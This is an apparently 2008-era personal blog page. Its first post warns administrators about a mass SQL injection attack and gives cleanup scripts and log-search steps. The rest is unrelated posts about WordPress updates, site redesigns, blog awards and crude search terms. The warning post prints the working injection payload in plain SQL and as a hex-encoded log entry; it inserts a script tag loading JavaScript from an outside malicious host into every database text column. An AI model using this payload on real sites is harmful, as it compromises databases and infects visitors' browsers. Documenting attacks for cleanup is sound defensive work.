Wikipedia says,

“SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.”

New SQL injection variant I stumbled on at work

Basically what it does is open 2 iframes and then installs a cookie - its also injecting into whatever database is there, I have not gone through all the code but it has already changed since this morning.  It is a very bad little piece of java.

*** DO NOT GO TO THIS URL (I have added spaces to eliminate accidental cllicking)***

Here is the code for the new injection:

BEGIN exec(’update ['+@T+'] set ['+@C+']=['+@C+']+””></title><script src=”http://jjmaoduo. 3322.org/csrss/w.js”></script><!–” where ‘+@C+’ not like ”%”></title><script src=”http://jjmaoduo. 3322.org/csrss/w.js”></script><!–”’)

Notice the beginning of the insert. Its not your traditional <script= its “></title><script src=

Bastards did it to move around the reverse script cleaning method. Here is a modified script taking into account the new “”></title><script src=” code. Oh also notice the closed html comment. This was to fight off the previous </script> for the WHERE clause on the cleaning script.

/*****Begin Script*****/
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update ['+@T+'] set ['+@C+']=reverse(right(reverse(convert(varchar (max),['+@C+'])), len(convert(varchar (max),['+@C+'])) - (patindex(”%<eltit/><”%”, reverse(convert(varchar (max),['+@C+']))) + 9))) where ['+@C+'] like ”%”></title>%<!–”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
/*****End Script*****/

The old cleaning script is below for looking at my references above.
/*****Begin Script*****/
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update ['+@T+'] set ['+@C+']=reverse(right(reverse(convert(varchar (max),['+@C+'])), len(convert(varchar (max),['+@C+'])) - (patindex(”%tpircs<%”, reverse(convert(varchar (max),['+@C+']))) + 6))) where ['+@C+'] like ”%<script%</script>”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
/*****End Script*****/

To find out which web pages are being hit go to the root of your web logs..

In iis there should be a site identifier that will help you to locate which site it is.

From the root of the web logs issue this command:
(this will search todays logs.. its its yesterday search then)

findstr /s /i /n /c:”declare” ex080807.log &gt;&gt; sql_inj_sites_080807.txt

This will check all recursive sub-folders for the word declare.

If you check that text file you probably have something that looks like this:

W3SVC12345678\ex080807.log:99:2008-08-07 12:57:12 W3SVC12345678 MY-WEBSERVER-HOSTNAME 67.42.4.85 GET /index.asp?topic=4;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 200

I truncated some of the rest of the stuff because its not important.. EXCEPT for the http return code

200 is ofcourse OK which means the webserver processes the request.

So a query string in index.asp located in the following website: W3SVC12345678.

You can find out which site that is by going into inetmgr and looking in the site identifier field.

If you are also a little more curious you can find the SQL code that is being injected by translating the hex after the 0x and before the %20AS% into ascii and that will give you the SQL code being used.

Comments/Questions etc.  Thanks.

This is a two-for-wednesday.  It would have been Tuesday but yeah… coding problems.

Number one:  As you can see wetwired has the new look that we promised.  I’ve been working on coding this for a while and given that I hate coding for wordpress, I think its turned out reasonably well.  There are slight issues with the sidebar and different browsers.  I’ll be continually working on it to try to address the issues that crop up.   Incedently if anyone is good with wordpres and divs and this stupid widgetized sidebar and can figure out why the twitter stuff loads 5 different ways from sunday on every browser, please let me know.

Number two: Wordpress 2.6 has been released.  This means new features for us, and maybe for you.  I tested slightly on our sandbox to verify all hell didn’t break loose and I’ve now updated wetwired to this latest version.  Let me know if you see something broken I might fix it, or I might laugh in your face.

You may or may not notice, but wetwired has been running extremly slow this morning and it was running slow last night.  At times it takes over 1 minute to load the page.  I have done some extensive troubleshooting with firefox, and firebug plugin and after turning off all plugins - defaulting back to the generic theme of wordpress all signs point to DB queries being the problem - meaning my host (godaddy) is having DB issues or performance issues.  Posting a static page works just fine and displays correctly.  I also noticed that they just updated php on the godaddy servers - who knows this could also be a factor.

I did some searching to see if there were wordpress performance posts or insight and there was - but I’ve covered the basis for reasons why it would be slow as notated above.  I can only wait until my host gets back to me.  Incidentally, when you call them you get a phone person who is nice but is not technical.  They then tell you they will escalate the issue and you’ll get an email back in a couple hours.  It’s been a couple hours.. no word.  We’ll see how good their support is.

Just updated to Wordpress 2.5.1 which contains 70 or so fixes and some security bugs etc.  Additionally they add a hash to the cookies which is specific to the site that makes it harder to hack.  Anyway, you guys won’t notice much, that changes are mostly all back end.

I’ve grabbed the K2 theme and threw up an older custom drawn header I had made some 2 years ago but never posted.  If you’ve followed any of the wetwired news posts about the site itself you’ll remember that several times I have begun to re-design the site and have not moved forward with it.  This time I have a new theme that I’ve got an artist working on and once its done I’ll be working hard on creating the wetwired theme for the site and then uploading it.

So needless to say here is the site in all its temporary template glory, but fully converted to wordpress including all the old posts and comments no less.  The forums will not be going back up, feel free to comment and notice that the comments actually work again!

So I finnally convinced Jenn to get a website and we’ve commisioned an artist to do some initial work for her site. We actually got the artwork done before she purchased the site. So tonight on godaddy.com we registered www.jennswanderlust.com - so within the next couple weeks I’ll have the site up and running with wordpress and some pretty snazzy graphics. I’ll also be incorporating some great new ajax plugins that are available for it as well. Anyway lots of good things - actaully once I’m done working on her site and tooling it up, its back to wetwired and other domains that I own. I’ll be working on a new format like I’ve been saying I’m planning on doing. Oh and the forums will be gone too.

Stay tuned for a face lift for wetwired very shortly.

Head over to http://moviebuddies.net wetwireds sister site to get the latest on movie news trailers, and participate on the forums. The idea behind movie buddies is basically allowing people who are movie fans to discuss and schedule meets to go and see movies as a group. The site has not officially launched but you can get a sneak peak, sign up on the forum now for a limited time! How’d you like that corporate advertising speach? Anyway, check it out, we like it, and we are looking for help with it as well.

Wetwired is nominated for the Best Blog Design on the 2005 Weblog Awards. Please go out and vote for us! Remeber you can vote once EVERY 24 hours. This post will remain at the top of wetwired until the polls are closed on December 15th.

About this Design:

Wetiwired is designed by Magnified Designs (pylorns etc) a custom web design company.

Graphic Design is done by Tyler Sticka. Almost all the cartoons are concept by pylorns and drawn and colored by Tyler.

The CSS and backend coding is designed and tested for the current most used browser , Internet Explorer 6.0 and then for Firefox. While I would like to code complely for Firefox, I feel it would be a bad idea to alienate the many users who do not know the ins and outs of other browsers.

The CSS is broken up into 2 separate style sheets and seems to work for the most part…

The concept is based on 1930’s and 40’s film noir The top logo is broken up into several smaller images and each author has his, her own posting image.

The Publishing Software is Movable Type Version 3.2

The Forum Software is XMB Forums v 1.9.1 Nexus. Color Schema by Magnified Designs

Thanks to Tyler, Wetwired has some buttons that you can link to and place on your site; just copy the code below. There are two separate buttons depending on your webpage style light and dark. Paste the exact code on your website navigation bar. If you have any questions or problems shoot an email to pylorns (at) gmail [dot] org

For Dark Backgrounds

For light backgrounds:

And remeber the competition is determined.

Yep Wetwired is a finalist for the 2005 Weblog awards for Best Blog Design. Tomorrow the polls open so make sure to go vote!

http://weblogawards.org/ hosted by wizbang.
Ok so we’re up for best blog design here:
Best Blog Design

So what I’ve done is gone through and looked at all the current sites that are designed well. Of course we think we have the best because well, its had many many redesigns and we have an artist that is the best.

1. Wetwired #1 yeah! But look, Using Movable type, Clean looking with great cartoons, and post icons that match. You can tell a lot of time and effort goes into wetwired.

2. Dizzy Girl always has multiple designs ranging from really cool to kinda blah.. right now the current skin she is using doesn’t stand out. I do hand it to her, she puts some serious effort into her friday posts!

3. The shape of days I have to hand it to them, they got a professional designer like moi, to design it. Its very good, the CSS layout is the way to go. I view this is real competition. - Update the professional designer/coder/”they” is just Jeff the owner of the blog. - Thanks Jeff for clarifying.

4. My Vast Right Wing Conspiracy Also not done by the author of the blog, professionally designed.. mostly. But listen, if its a right wing conspiracy, why are all the graphics on the left?!

5. Sharp as a Marble Using a notbook style layout, which has been done before, but it still looks like they put in effort. What would have been cooler is that if the posts would have been on the lines of the notebook instead of a white box on top of it.

6. Gentlemen Prefer Blogs Decent graphics, the professionally designed look - and in fact it is, nice little graphics for the posts too.

7. Lord Boom Boom These guys are bringing up the rear, the image is kinda cool, but nothing really stands out as being clean and consise. I guess the color scheme just bugs me.

8. Just a girl in the world Its clean, all the graphics mesh together.

9. Scrubbles They are so so, its better than some of the others on blogger still.

10. LJC FYI Themed for fall colors, interesting little cartoons, kinda similar to wetwired, not bad.

So there you have it, the ones that currently stand out against the crowd, the rest are using default templates of blogger or movable type, or really haven’t put any effort into designing. Or maybe you have, but it doesn’t show. Having a good design on your blog takes a lot of though out work and some artistic talent, form follows function.

It’s that time again when we look at what brought you sick bastards to this site. All I have to say is “China Kitty Porn” you are one wierd wanker how the hell you even got here by that search is beyond me. Now all you fluffers out there, we salute you. Oh midget lovers too.

1 21 7.42% fluffer pics
2 9 3.18% angela devi
3 7 2.47% lamb and lynx gaede pics
4 6 2.12% gail o’toole
5 6 2.12% ken slaby
6 4 1.41% gail o’tool
7 4 1.41% lamb and lynx gaede
8 4 1.41% wetwired
9 4 1.41% wetwired.org
10 3 1.06% adult film fluffers
11 3 1.06% bridgette the midget
12 3 1.06% dell layoffs october 2005
13 3 1.06% лещен
14 2 0.71% %22caption this pic%22
15 2 0.71% all about american holidays by mayme r. krythe
16 2 0.71% austin
17 2 0.71% austin texas blog
18 2 0.71% china kitty porn
19 2 0.71% cnn terri schiavo
20 2 0.71% deadpool pics

Yet another test for tags.. it’d be nice if they made this just a tad bit easier..

quote! test test